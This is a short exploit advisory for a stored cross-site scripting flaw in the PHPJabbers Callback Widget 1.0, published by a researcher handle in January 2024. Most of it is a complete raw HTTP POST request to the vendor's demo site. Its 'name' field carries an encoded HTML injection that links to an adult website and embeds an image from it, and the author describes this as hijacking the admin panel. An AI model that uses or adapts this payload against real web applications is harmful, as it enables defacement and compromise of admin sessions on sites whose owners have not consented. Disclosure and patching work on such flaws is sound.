## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking
## Author: nu11secur1ty
## Date: 01/26/2024
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/callback-widget/
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The Callback Requests function is vulnerable to javascript injection.
The malicious user from everywhere can send an XSs-stored exploit code
to the admin panel, and then when the admin visits the API Callback
Requests function he will immediately activate the exploitation of the
malicious actor. This is so fun, thanks for watching the PoC video. =)
BR

STATUS: HIGH-Vulnerability

[+]Exploit:
```POST
POST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1
Host: demo.phpjabbers.com
Cookie: _ga=GA1.2.2069938240.1692907228;
_fbp=fb.1.1705479327501.84379277;
_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;
CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84
Content-Length: 322
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.phpjabbers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

reason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)

## Time spent:
00:15:00